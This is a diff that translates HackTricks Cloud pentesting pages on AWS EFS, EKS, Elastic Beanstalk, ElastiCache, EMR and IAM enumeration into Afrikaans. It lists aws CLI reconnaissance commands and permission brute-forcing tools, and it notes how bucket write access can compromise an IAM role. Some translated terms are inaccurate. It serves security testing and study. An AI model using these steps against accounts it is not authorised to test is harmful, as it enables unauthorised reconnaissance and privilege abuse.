+**Jy kan die LĂȘerstelsel vanaf 'n toegangspunt monteer met iets soos:** ```bash # Use IAM if you need to use iam permissions sudo mount -t efs -o tls,[iam],accesspoint= \ - /efs/ + /efs/ ``` - > [!WARNING] -> Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it. +> Let daarop dat selfs om 'n toegangspunt te probeer monteer, jy steeds moet **kontak maak met die NFS-diens via netwerk**, en as die EFS 'n lĂȘerstelsel **beleid** het, het jy **voldoende IAM-toestemmings** nodig om dit te monteer. -Access points can be used for the following purposes: +Toegangspunte kan vir die volgende doeleindes gebruik word: -- **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions. -- **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification. -- **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications. +- **Vereenvoudig toestemmingsbestuur**: Deur 'n POSIX-gebruiker en -groep vir elke toegangspunt te definieer, kan jy maklik toegangstoestemmings vir verskillende toepassings of gebruikers bestuur sonder om die onderliggende lĂȘerstelsel se toestemmings te wysig. +- **Afgedwonge 'n wortelgids**: Toegangspunte kan toegang tot 'n spesifieke gids binne die EFS-lĂȘerstelsel beperk, wat verseker dat elke toepassing of gebruiker binne sy aangewese vouer werk. Dit help om toevallige data-blootstelling of -wysiging te voorkom. 
+- **Makliker lĂȘerstelseltoegang**: Toegangspunte kan geassosieer word met 'n AWS Lambda-funksie of 'n AWS Fargate-taak, wat lĂȘerstelseltoegang vir serverless en gekontaineriseerde toepassings vereenvoudig. ## Privesc @@ -142,7 +132,3 @@ Access points can be used for the following purposes: {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md index a7ead6d10..081ca3968 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md 
@@ -4,17 +4,16 @@ ## EKS -Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. +Amazon Elastic Kubernetes Service (Amazon EKS) is ontwerp om die behoefte aan gebruikers te verwyder om hul eie Kubernetes-beheervlak of nodes te installeer, te bedryf en te bestuur. In plaas daarvan bestuur Amazon EKS hierdie komponente, wat 'n vereenvoudigde manier bied om gecontaineriseerde toepassings met behulp van Kubernetes op AWS te ontplooi, te bestuur en te skaal. -Key aspects of Amazon EKS include: +Belangrike aspekte van Amazon EKS sluit in: -1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. -2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. -3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. -4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. +1. **Geverifieerde Kubernetes Beheervlak**: Amazon EKS outomatiseer kritieke take soos patching, node provisioning, en opdaterings. +2. **Integrasie met AWS Dienste**: Dit bied naatlose integrasie met AWS-dienste vir berekening, stoor, databasis, en sekuriteit. +3. **Skaalbaarheid en Sekuriteit**: Amazon EKS is ontwerp om hoogs beskikbaar en veilig te wees, wat funksies soos outomatiese skaal en isolasie deur ontwerp bied. +4. **Compatibiliteit met Kubernetes**: Toepassings wat op Amazon EKS loop, is volledig versoenbaar met toepassings wat op enige standaard Kubernetes-omgewing loop. 
#### Enumeration - ```bash aws eks list-clusters aws eks describe-cluster --name @@ -32,19 +31,14 @@ aws eks describe-nodegroup --cluster-name --nodegroup-name aws eks list-updates --name aws eks describe-update --name --update-id ``` - #### Post Exploitation {{#ref}} ../aws-post-exploitation/aws-eks-post-exploitation.md {{#endref}} -## References +## Verwysings - [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md index 980504dac..115cfbd3b 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md 
@@ -4,70 +4,69 @@ ## Elastic Beanstalk -Amazon Elastic Beanstalk provides a simplified platform for **deploying, managing, and scaling web applications and services**. It supports a variety of programming languages and frameworks, such as Java, .NET, PHP, Node.js, Python, Ruby, and Go, as well as Docker containers. The service is compatible with widely-used servers including Apache, Nginx, Passenger, and IIS. +Amazon Elastic Beanstalk bied 'n vereenvoudigde platform vir **die ontplooiing, bestuur en skaal van webtoepassings en dienste**. Dit ondersteun 'n verskeidenheid programmering tale en raamwerke, soos Java, .NET, PHP, Node.js, Python, Ruby, en Go, sowel as Docker houers. Die diens is versoenbaar met wyd gebruikte bedieners insluitend Apache, Nginx, Passenger, en IIS. -Elastic Beanstalk provides a simple and flexible way to **deploy your applications to the AWS cloud**, without the need to worry about the underlying infrastructure. It **automatically** handles the details of capacity **provisioning**, load **balancing**, **scaling**, and application health **monitoring**, allowing you to focus on writing and deploying your code. +Elastic Beanstalk bied 'n eenvoudige en buigsame manier om **jou toepassings na die AWS wolk te ontplooi**, sonder om te bekommer oor die onderliggende infrastruktuur. Dit **hanteer outomaties** die besonderhede van kapasiteit **verskaffing**, las **balansering**, **skaal**, en toepassingsgesondheid **monitering**, wat jou toelaat om te fokus op die skryf en ontplooiing van jou kode. -The infrastructure created by Elastic Beanstalk is managed by **Autoscaling** Groups in **EC2** (with a load balancer). Which means that at the end of the day, if you **compromise the host**, you should know about about EC2: +Die infrastruktuur geskep deur Elastic Beanstalk word bestuur deur **Autoscaling** Groepe in **EC2** (met 'n lasbalanser). 
Dit beteken dat aan die einde van die dag, as jy **die gasheer kompromitteer**, jy moet weet van EC2: {{#ref}} aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} -Moreover, if Docker is used, it’s possible to use **ECS**. +Boonop, as Docker gebruik word, is dit moontlik om **ECS** te gebruik. {{#ref}} aws-eks-enum.md {{#endref}} -### Application & Environments +### Toepassing & Omgewings -In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" serve different purposes and have distinct roles in the deployment process. +In AWS Elastic Beanstalk, dien die konsepte van 'n "toepassing" en 'n "omgewing" verskillende doeleindes en het dit onderskeidende rolle in die ontplooiingsproses. -#### Application +#### Toepassing -- An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity. -- When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources. -- You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments. +- 'n Toepassing in Elastic Beanstalk is 'n **logiese houer vir jou toepassing se bronkode, omgewings, en konfigurasies**. Dit groepeer verskillende weergawes van jou toepassingskode en laat jou toe om dit as 'n enkele entiteit te bestuur. +- Wanneer jy 'n toepassing skep, verskaf jy 'n naam en **beskrywing, maar geen hulpbronne word op hierdie stadium verskaf**. Dit is eenvoudig 'n manier om jou kode en verwante hulpbronne te organiseer en te bestuur. +- Jy kan **meervoudige toepassingsweergawes** binne 'n toepassing hĂȘ. 
Elke weergawe stem ooreen met 'n spesifieke vrystelling van jou kode, wat na een of meer omgewings ontplooi kan word. -#### Environment +#### Omgewing -- An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration. -- **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production. -- When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings. +- 'n Omgewing is 'n **verskafde instansie van jou toepassing** wat op AWS infrastruktuur loop. Dit is **waar jou toepassingskode ontplooi en uitgevoer word**. Elastic Beanstalk verskaf die nodige hulpbronne (bv. EC2 instansies, lasbalansers, outo-skaal groepe, databasisse) gebaseer op die omgewing konfigurasie. +- **Elke omgewing loop 'n enkele weergawe van jou toepassing**, en jy kan verskeie omgewings vir verskillende doeleindes hĂȘ, soos ontwikkeling, toetsing, staging, en produksie. +- Wanneer jy 'n omgewing skep, kies jy 'n platform (bv. Java, .NET, Node.js, ens.) en 'n omgewing tipe (bv. webbediener of werker). Jy kan ook die omgewing konfigurasie aanpas om verskeie aspekte van die infrastruktuur en toepassingsinstellings te beheer. -### 2 types of Environments +### 2 tipes Omgewings -1. **Web Server Environment**: It is designed to **host and serve web applications and APIs**. These applications typically handle incoming HTTP/HTTPS requests. 
The web server environment provisions resources such as **EC2 instances, load balancers, and auto-scaling** groups to handle incoming traffic, manage capacity, and ensure the application's high availability. -2. **Worker Environment**: It is designed to process **background tasks**, which are often time-consuming or resource-intensive operations that don't require immediate responses to clients. The worker environment provisions resources like **EC2 instances and auto-scaling groups**, but it **doesn't have a load balancer** since it doesn't handle HTTP/HTTPS requests directly. Instead, it consumes tasks from an **Amazon Simple Queue Service (SQS) queue**, which acts as a buffer between the worker environment and the tasks it processes. +1. **Webbediener Omgewing**: Dit is ontwerp om **webtoepassings en API's te huisves en te bedien**. Hierdie toepassings hanteer tipies inkomende HTTP/HTTPS versoeke. Die webbediener omgewing verskaf hulpbronne soos **EC2 instansies, lasbalansers, en outo-skaal** groepe om inkomende verkeer te hanteer, kapasiteit te bestuur, en die hoĂ« beskikbaarheid van die toepassing te verseker. +2. **Werker Omgewing**: Dit is ontwerp om **agtergrond take** te verwerk, wat dikwels tydrowende of hulpbron-intensiewe operasies is wat nie onmiddellike reaksies aan kliĂ«nte vereis nie. Die werker omgewing verskaf hulpbronne soos **EC2 instansies en outo-skaal groepe**, maar dit **het nie 'n lasbalanser** nie aangesien dit nie HTTP/HTTPS versoeke direk hanteer nie. In plaas daarvan, verbruik dit take van 'n **Amazon Simple Queue Service (SQS) waglyn**, wat as 'n buffer tussen die werker omgewing en die take wat dit verwerk, dien. 
-### Security +### Sekuriteit -When creating an App in Beanstalk there are 3 very important security options to choose: +Wanneer jy 'n App in Beanstalk skep, is daar 3 baie belangrike sekuriteitsopsies om te kies: -- **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app -- **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**) - - The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier). -- **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role. - - This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions) +- **EC2 sleutel paar**: Dit sal die **SSH sleutel** wees wat toegang tot die EC2 instansies wat die app loop, sal hĂȘ. +- **IAM instansie profiel**: Dit is die **instansie profiel** wat die instansies sal hĂȘ (**IAM voorregte**). 
+- Die outomaties gegenereerde rol word **`aws-elasticbeanstalk-ec2-role`** genoem en het 'n paar interessante toegang oor alle ECS, alle SQS, DynamoDB elasticbeanstalk en elasticbeanstalk S3 met behulp van die AWS bestuurde beleide: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier). +- **Diens rol**: Dit is die **rol wat die AWS diens** sal gebruik om al die nodige aksies uit te voer. Afaik, 'n gewone AWS gebruiker kan nie toegang tot daardie rol kry nie. +- Hierdie rol wat deur AWS gegenereer is, word **`aws-elasticbeanstalk-service-role`** genoem en gebruik die AWS bestuurde beleide [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) en [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions) -By default **metadata version 1 is disabled**: +Standaard is **metadata weergawe 1 gedeaktiveer**:
-### Exposure +### Blootstelling -Beanstalk data is stored in a **S3 bucket** with the following name: **`elasticbeanstalk--`**(if it was created in the AWS console). Inside this bucket you will find the uploaded **source code of the application**. +Beanstalk data word gestoor in 'n **S3 emmer** met die volgende naam: **`elasticbeanstalk--`** (as dit in die AWS konsole geskep is). Binne hierdie emmer sal jy die opgelaaide **bronkode van die toepassing** vind. -The **URL** of the created webpage is **`http://-env...elasticbeanstalk.com/`** +Die **URL** van die geskepte webblad is **`http://-env...elasticbeanstalk.com/`** > [!WARNING] -> If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it +> As jy **lees toegang** oor die emmer kry, kan jy **die bronkode lees** en selfs **sensitiewe akrediteer** daarop vind. > -> if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed. - -### Enumeration +> As jy **skryf toegang** oor die emmer kry, kan jy **die bronkode wysig** om die **IAM rol** wat die toepassing gebruik, die volgende keer wat dit uitgevoer word, te **kompromitteer**. +### Enumerasie ```bash # Find S3 bucket ACCOUNT_NUMBER= 
@@ -85,33 +84,28 @@ aws elasticbeanstalk describe-instances-health --environment-name # G # Get events aws elasticbeanstalk describe-events ``` - -### Unauthenticated Access +### Ongeauthentiseerde Toegang {{#ref}} ../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md {{#endref}} -### Persistence +### Volharding {{#ref}} ../aws-persistence/aws-elastic-beanstalk-persistence.md {{#endref}} -### Privesc +### Privilege Escalation {{#ref}} ../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md {{#endref}} -### Post Exploitation +### Post Exploitatie {{#ref}} ../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md index 6305fcc91..2c125e511 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md 
@@ -4,10 +4,9 @@ ## ElastiCache -AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**. +AWS ElastiCache is 'n volledig **bestuurde in-geheue data-opslag en kasdiens** wat hoĂ«-prestasie, lae-latensie, en skaalbare oplossings vir toepassings bied. Dit ondersteun twee gewilde oopbron in-geheue enjins: **Redis en Memcached**. ElastiCache **vereenvoudig** die **opstelling**, **bestuur**, en **onderhoud** van hierdie enjins, wat ontwikkelaars in staat stel om tydrowende take soos voorsiening, patching, monitering, en **rugsteun** te ontlaai. ### Enumeration - ```bash # ElastiCache clusters ## Check the SecurityGroups to later check who can access @@ -39,11 +38,6 @@ aws elasticache describe-users # List ElastiCache events aws elasticache describe-events ``` - ### Privesc (TODO) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md index b05012f3e..69756455d 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md 
@@ -4,38 +4,37 @@ ## EMR -AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. +AWS se Elastic MapReduce (EMR) diens, wat begin met weergawe 4.8.0, het 'n **veiligheidskonfigurasie** kenmerk bekendgestel wat databeskydding verbeter deur gebruikers toe te laat om versleutelinginstellings vir data in rus en in oordrag binne EMR-klusters, wat skaalbare groepe van EC2-instanties is wat ontwerp is om groot data-raamwerke soos Apache Hadoop en Spark te verwerk, te spesifiseer. -Key characteristics include: +Belangrike kenmerke sluit in: -- **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: - - **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. - - **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: - - Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. - - HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. -- **Encryption in Transit**: Focuses on securing data during transfer. Options include: - - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: - - **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. - - **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. +- **Kluster Versleuteling Standaard**: Standaard is data in rus binne 'n kluster nie versleuteld nie. 
Dit is egter moontlik om versleuteling in te skakel wat toegang tot verskeie funksies bied: +- **Linux Unified Key Setup**: Versleutelt EBS-klustervolumes. Gebruikers kan kies vir AWS Key Management Service (KMS) of 'n pasgemaakte sleutelverskaffer. +- **Open-Source HDFS Versleuteling**: Bied twee versleutelingopsies vir Hadoop: +- Veilige Hadoop RPC (Remote Procedure Call), gestel op privaatheid, wat die Simple Authentication Security Layer benut. +- HDFS Blok oordrag versleuteling, gestel op waar, gebruik die AES-256 algoritme. +- **Versleuteling in Oordrag**: Fokus op die beveiliging van data tydens oordrag. Opsies sluit in: +- **Open Source Transport Layer Security (TLS)**: Versleuteling kan geaktiveer word deur 'n sertifikaatverskaffer te kies: +- **PEM**: Vereis handmatige skepping en bundeling van PEM-sertifikate in 'n zip-lĂȘer, waarna verwys word vanaf 'n S3-bucket. +- **Pasgemaak**: Betrek die toevoeging van 'n pasgemaakte Java-klas as 'n sertifikaatverskaffer wat versleutelingartefakte verskaf. -Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: +Sodra 'n TLS-sertifikaatverskaffer in die veiligheidskonfigurasie geĂŻntegreer is, kan die volgende toepassingspesifieke versleutelingkenmerke geaktiveer word, wat wissel op grond van die EMR-weergawe: - **Hadoop**: - - Might reduce encrypted shuffle using TLS. - - Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. -- **Presto** (EMR version 5.6.0+): - - Internal communication between Presto nodes is secured using SSL and TLS. +- Mag versleutelde shuffle met TLS verminder. +- Veilige Hadoop RPC met Simple Authentication Security Layer en HDFS Blok Oordrag met AES-256 word geaktiveer met versleuteling in rus. 
+- **Presto** (EMR weergawe 5.6.0+): +- Interne kommunikasie tussen Presto-knope is beveilig met SSL en TLS. - **Tez Shuffle Handler**: - - Utilizes TLS for encryption. +- Gebruik TLS vir versleuteling. - **Spark**: - - Employs TLS for the Akka protocol. - - Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. - - External shuffle service is secured with the Simple Authentication Security Layer. +- Gebruik TLS vir die Akka-protokol. +- Gebruik Simple Authentication Security Layer en 3DES vir Blok Oordragdiens. +- Eksterne shuffle diens is beveilig met die Simple Authentication Security Layer. -These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. +Hierdie kenmerke verbeter saam die sekuriteitsposisie van EMR-klusters, veral met betrekking tot databeskydding tydens berging en oordragfases. #### Enumeration - ```bash aws emr list-clusters aws emr describe-cluster --cluster-id @@ -46,19 +45,14 @@ aws emr list-notebook-executions aws emr list-security-configurations aws emr list-studios #Get studio URLs ``` - #### Privesc {{#ref}} ../aws-privilege-escalation/aws-emr-privesc.md {{#endref}} -## References +## Verwysings - [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md index 7a430cc17..8808e6969 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md 
@@ -1,20 +1,20 @@ -# AWS - IAM, Identity Center & SSO Enum +# AWS - IAM, Identiteitsentrum & SSO Enum {{#include ../../../banners/hacktricks-training.md}} ## IAM -You can find a **description of IAM** in: +Jy kan 'n **beskrywing van IAM** vind in: {{#ref}} ../aws-basic-information/ {{#endref}} -### Enumeration +### Enumerasie -Main permissions needed: +Hoof toestemmings benodig: -- `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion` +- `iam:ListPolicies`, `iam:GetPolicy` en `iam:GetPolicyVersion` - `iam:ListRoles` - `iam:ListUsers` - `iam:ListGroups` @@ -22,10 +22,9 @@ Main permissions needed: - `iam:ListAttachedUserPolicies` - `iam:ListAttachedRolePolicies` - `iam:ListAttachedGroupPolicies` -- `iam:ListUserPolicies` and `iam:GetUserPolicy` -- `iam:ListGroupPolicies` and `iam:GetGroupPolicy` -- `iam:ListRolePolicies` and `iam:GetRolePolicy` - +- `iam:ListUserPolicies` en `iam:GetUserPolicy` +- `iam:ListGroupPolicies` en `iam:GetGroupPolicy` +- `iam:ListRolePolicies` en `iam:GetRolePolicy` ```bash # All IAMs ## Retrieves information about all IAM users, groups, roles, and policies 
@@ -89,64 +88,54 @@ aws iam get-account-password-policy aws iam list-mfa-devices aws iam list-virtual-mfa-devices ``` +### Toestemmings Brute Force -### Permissions Brute Force - -If you are interested in your own permissions but you don't have access to query IAM you could always brute-force them. +As jy belangstel in jou eie toestemmings, maar jy het nie toegang om IAM te ondervra nie, kan jy altyd brute-force hulle. #### bf-aws-permissions -The tool [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is just a bash script that will run using the indicated profile all the **`list*`, `describe*`, `get*`** actions it can find using `aws` cli help messages and **return the successful executions**. - +Die hulpmiddel [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is net 'n bash-skrip wat sal loop met die aangeduide profiel al die **`list*`, `describe*`, `get*`** aksies wat dit kan vind met behulp van `aws` cli hulpboodskappe en **teruggee die suksesvolle uitvoerings**. ```bash # Bruteforce permissions bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt ``` - #### bf-aws-perms-simulate -The tool [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) can find your current permission (or the ones of other principals) if you have the permission **`iam:SimulatePrincipalPolicy`** - +Die hulpmiddel [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) kan jou huidige toestemmings (of diĂ© van ander principals) vind as jy die toestemming **`iam:SimulatePrincipalPolicy`** het. ```bash # Ask for permissions python3 aws_permissions_checker.py --profile [--arn ] ``` - #### Perms2ManagedPolicies -If you found **some permissions your user has**, and you think that they are being granted by a **managed AWS role** (and not by a custom one). 
You can use the tool [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) to check all the **AWS managed roles that grants the permissions you discovered that you have**. - +As jy **sekere toestemmings gevind het wat jou gebruiker het**, en jy dink dat dit toegeken word deur 'n **bestuurde AWS rol** (en nie deur 'n pasgemaakte een nie). Jy kan die hulpmiddel [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) gebruik om al die **AWS bestuurde rolle wat die toestemmings wat jy ontdek het dat jy het, toeken** te kontroleer. ```bash # Run example with my profile python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt ``` - > [!WARNING] -> It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example. +> Dit is moontlik om te "weet" of die toestemmings wat jy het, toegeken is deur 'n AWS bestuurde rol as jy sien dat **jy toestemmings oor dienste het wat nie gebruik word nie** byvoorbeeld. #### Cloudtrail2IAM -[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is a Python tool that analyses **AWS CloudTrail logs to extract and summarize actions** done by everyone or just an specific user or role. The tool will **parse every cloudtrail log from the indicated bucket**. - +[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is 'n Python-gereedskap wat **AWS CloudTrail logs analiseer om aksies** wat deur almal of net 'n spesifieke gebruiker of rol gedoen is, te onttrek en saam te vat. Die gereedskap sal **elke cloudtrail log van die aangeduide emmer parse**. 
```bash git clone https://github.com/carlospolop/Cloudtrail2IAM cd Cloudtrail2IAM pip install -r requirements.txt python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS] ``` - > [!WARNING] -> If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who. +> As jy .tfstate (Terraform toestand lĂȘers) of CloudFormation lĂȘers (dit is gewoonlik yaml lĂȘers wat binne 'n emmer met die voorvoegsel cf-templates geleĂ« is) vind, kan jy dit ook lees om aws konfigurasie te vind en te sien watter toestemmings aan wie toegeken is. #### enumerate-iam -To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) you first need to download all the API AWS endpoints, from those the script **`generate_bruteforce_tests.py`** will get all the **"list\_", "describe\_", and "get\_" endpoints.** And finally, it will try to **access them** with the given credentials and **indicate if it worked**. +Om die hulpmiddel [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) te gebruik, moet jy eers al die API AWS eindpunte aflaai, van daardie sal die skrip **`generate_bruteforce_tests.py`** al die **"list\_", "describe\_", en "get\_" eindpunte kry.** En uiteindelik sal dit probeer om **toegang tot hulle** te verkry met die gegewe akrediteer en **aangee of dit gewerk het**. -(In my experience the **tool hangs at some point**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) to try to fix that). 
+(Volgens my ervaring hang die **hulpmiddel op 'n sekere punt**, [**kyk na hierdie oplossing**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) om te probeer om dit reg te stel). > [!WARNING] -> In my experience this tool is like the previous one but working worse and checking less permissions - +> Volgens my ervaring is hierdie hulpmiddel soos die vorige, maar werk erger en kontroleer minder toestemmings. ```bash # Install tool git clone git@github.com:andresriancho/enumerate-iam.git @@ -163,11 +152,9 @@ cd .. # Enumerate permissions python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--session-token SESSION_TOKEN] [--region REGION] ``` - #### weirdAAL -You could also use the tool [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). This tool will check **several common operations on several common services** (will check some enumeration permissions and also some privesc permissions). But it will only check the coded checks (the only way to check more stuff if coding more tests). - +Jy kan ook die hulpmiddel [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki) gebruik. Hierdie hulpmiddel sal **verskeie algemene operasies op verskeie algemene dienste nagaan** (sal 'n paar enumerasie-toestemmings en ook 'n paar privesc-toestemmings nagaan). Maar dit sal slegs die gekodeerde toetse nagaan (die enigste manier om meer goed na te gaan is om meer toetse te kodeer). ```bash # Install git clone https://github.com/carnal0wnage/weirdAAL.git 
